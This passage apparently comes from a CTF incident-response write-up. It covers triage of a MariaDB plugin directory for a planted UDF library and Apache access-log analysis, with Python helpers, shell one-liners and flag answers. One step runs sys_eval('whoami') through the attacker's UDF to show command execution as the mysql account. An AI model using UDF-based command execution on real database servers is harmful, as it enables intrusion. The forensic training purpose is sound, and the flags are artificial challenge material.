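"""Triage a MariaDB/MySQL plugin directory for a planted UDF library."""
import os
import stat
import tempfile
from collections import Counter

ELF_MAGIC = b"\x7fELF"          # every loadable shared object starts with this


def triage_plugin_dir(plugin_dir, func_dl_names):
    """Return [(filename, [findings])] for regular files in plugin_dir that deserve a look.

    func_dl_names: the 'dl' values from the mysql.func table, i.e. the libraries mysqld
    actually dlopen()s when the registered functions are called.
    """
    paths = {n: os.path.join(plugin_dir, n) for n in sorted(os.listdir(plugin_dir))}
    stats = {n: os.lstat(p) for n, p in paths.items() if stat.S_ISREG(os.lstat(p).st_mode)}
    if not stats:
        return []
    # Packaged plugins share one install date; anything dated differently is an outlier.
    baseline_day = Counter(int(s.st_mtime // 86400) for s in stats.values()).most_common(1)[0][0]
    results = []
    for name, st in stats.items():
        issues = []
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            issues.append("group/world-writable")
        if int(st.st_mtime // 86400) != baseline_day:
            issues.append("mtime differs from the packaged plugins")
        with open(paths[name], "rb") as fh:
            magic = fh.read(len(ELF_MAGIC))
        if magic != ELF_MAGIC:
            issues.append(f"not an ELF object ({st.st_size} bytes)")
        if name in func_dl_names:
            issues.append("registered in mysql.func")
        if issues:
            results.append((name, issues))
    return results


def _write(path, data, mode, mtime):
    with open(path, "wb") as fh:
        fh.write(data)
    os.chmod(path, mode)
    os.utime(path, (mtime, mtime))


def build_demo_dir():
    """Constructed stand-in for /usr/lib/mysql/plugin: names, modes, sizes and dates follow
    the listing above; the contents are invented (a minimal ELF header or plain text)."""
    d = tempfile.mkdtemp(prefix="plugin-")
    packaged = 1557964800        # 2019-05-16 UTC, the distro plugins' date
    attack = 1690848000          # 2023-08-01 UTC, the day of the intrusion
    fake_elf = ELF_MAGIC + b"\x02\x01\x01" + b"\0" * 120
    for name in ("auth_socket.so", "dialog.so", "server_audit.so"):
        _write(os.path.join(d, name), fake_elf, 0o644, packaged)
    _write(os.path.join(d, "mysqludf.so"), fake_elf, 0o666, attack)
    _write(os.path.join(d, "udf.so"), b"this is not a shared object at all", 0o666, attack)
    return d


if __name__ == "__main__":
    demo = build_demo_dir()
    for name, issues in triage_plugin_dir(demo, {"mysqludf.so"}):
        print(f"{name}: {', '.join(issues)}")
```

On a live host, feed it the real directory and the dl values from select dl from mysql.func; the file flagged both "registered in mysql.func" and as an mtime outlier is the one to hash and preserve, and a world-writable plugin directory entry is itself a finding regardless of who planted it.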
4. The privilege the attacker obtained: flag{output of whoami}
Run whoami through the attacker's own UDF (this executes the attacker's shared object on the evidence host; checking which account mysqld runs as, e.g. from the process list, gives the same answer without doing that):

```
MariaDB [mysql]> select sys_eval("whoami")
    -> ;
+--------------------+
| sys_eval("whoami") |
+--------------------+
| mysql
 |
+--------------------+
1 row in set (0.01 sec)
```

The stray line break is the trailing newline from whoami; the value is mysql. UDF code runs inside the mysqld process, so sys_eval gives the attacker the database server's account, not root.
Chapter 2 Log Analysis - Apache Log Analysis
1. Submit the IP with the most requests on that day, i.e. the attacker's IP:

```bash
cat /var/log/apache2/access.log |grep "03/Aug/2023:08:" | awk '{print $1}' | sort | uniq -c | sort -nr | head -n 10
```

```
6555 192.168.200.2
29 ::1
5 192.168.200.38
1 192.168.200.48
1 192.168.200.211
```

(The grep pattern restricts the count to the 08:00 hour of 3 Aug 2023 rather than the whole day; drop the trailing ":08:" for a full-day count. The same filtered output is reused for questions 4 and 5 below.) The attacker IP is 192.168.200.2, so that is the flag.
2. What browser fingerprint (User-Agent) did the attacker use? Submit its md5:

```bash
cat /var/log/apache2/access.log | grep "192.168.200.2" | awk -F'"' '{print $6}' | uniq -c
```

```
12 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
1 curl/7.74.0
6543 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
```

Two caveats on this one-liner: grep "192.168.200.2" is a substring match over the whole line, so it also catches 192.168.200.211 (and any other field containing that text, such as a Referer), and uniq -c only merges adjacent lines, so the same UA can be listed more than once unless you sort first. When the counts matter, match the first field exactly (awk '$1=="192.168.200.2"') and sort before uniq. The dominant UA is clearly the Chrome string, and its md5 is the flag:

```
flag{2D6330F380F44AC20F3A02EED0958F66}
```
3. How many times were pages containing index.php accessed? Submit the count:

```bash
cat /var/log/apache2/access.log | grep "/index.php" | wc -l
```

Note that a plain grep also matches index.php appearing in the Referer field; to count requests to the page, match on the request field only.
4. How many requests did the attacker IP make? Submit the count:
The number is already in the output of question 1 (6555 for 192.168.200.2); for a precise count, grep for that IP alone and pipe to wc -l.
5. How many IPs accessed the server during the 08:00 hour of 3 August 2023? Submit the count:
From the same output, 5 distinct IPs; or append wc -l to that pipeline to count them.
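The five questions above are all the same operation (filter the log, group by one field, count) and the one-liners share the same pitfall: grep matches a substring anywhere on the line, not a specific field. The following added example (not from the original write-up) parses the combined format properly and answers each question by field, alongside a naive line-match so the difference is visible. The six log lines in it are constructed to trigger both pitfalls and are not the challenge's access.log; only the attacker's Chrome User-Agent is taken from the output above.

```python
"""Apache combined-log statistics for the chapter 2 questions, with exact field matching."""
import hashlib
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# The attacker's User-Agent as it appears in the write-up's output above.
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36")

# Constructed sample log: an attacker IP whose address is a prefix of another client's,
# an index.php that appears only in a Referer, and an entry outside the 08:00 hour.
SAMPLE_LOG = "\n".join([
    f'192.168.200.2 - - [03/Aug/2023:08:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "{CHROME_UA}"',
    f'192.168.200.2 - - [03/Aug/2023:08:00:02 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "{CHROME_UA}"',
    f'192.168.200.2 - - [03/Aug/2023:08:00:03 +0000] "GET /admin.php HTTP/1.1" 404 209 '
    f'"http://192.168.200.31:8005/index.php" "{CHROME_UA}"',
    '192.168.200.211 - - [03/Aug/2023:08:05:00 +0000] "GET / HTTP/1.1" 200 1024 "-" "curl/7.74.0"',
    '192.168.200.38 - - [03/Aug/2023:08:10:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"',
    '::1 - - [03/Aug/2023:09:00:00 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.54 (internal dummy connection)"',
]) + "\n"


def parse(log_text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    return [m.groupdict() for m in map(LOG_RE.match, log_text.splitlines()) if m]


def requests_per_ip(entries, hour=None):
    """(ip, count) pairs, busiest first; hour such as '03/Aug/2023:08' restricts the window."""
    counts = Counter(e["ip"] for e in entries if hour is None or e["ts"].startswith(hour))
    return counts.most_common()


def distinct_ips(entries, hour):
    """Number of different client IPs seen within the given hour prefix."""
    return len({e["ip"] for e in entries if e["ts"].startswith(hour)})


def user_agents(entries, ip):
    """UA strings used by exactly this client IP (field equality, not a substring match)."""
    return Counter(e["ua"] for e in entries if e["ip"] == ip).most_common()


def fingerprint_md5(ua):
    """md5 of the User-Agent string, upper-case hex as the flag format above uses."""
    return hashlib.md5(ua.encode("utf-8")).hexdigest().upper()


def requests_to(entries, needle):
    """Requests whose request target contains needle; the Referer field is not consulted."""
    return sum(1 for e in entries if needle in e["target"])


def naive_line_matches(log_text, needle):
    """What 'grep needle | wc -l' counts: any occurrence anywhere on the line."""
    return sum(1 for line in log_text.splitlines() if needle in line)


if __name__ == "__main__":
    entries = parse(SAMPLE_LOG)
    hour = "03/Aug/2023:08"
    attacker = requests_per_ip(entries, hour)[0][0]
    print("Q1 busiest IP:", attacker)
    print("Q2 UA md5:", fingerprint_md5(user_agents(entries, attacker)[0][0]))
    print("Q3 requests to index.php:", requests_to(entries, "index.php"),
          "(grep would say", naive_line_matches(SAMPLE_LOG, "/index.php"), ")")
    print("Q4 attacker requests:", dict(requests_per_ip(entries))[attacker],
          "(grep would say", naive_line_matches(SAMPLE_LOG, attacker), ")")
    print("Q5 distinct IPs in hour:", distinct_ips(entries, hour))
```

Replace SAMPLE_LOG with the contents of /var/log/apache2/access.log to answer the real questions; on the sample, the grep-style counts for Q3 and Q4 are each one too high because of the Referer and the 192.168.200.211 client.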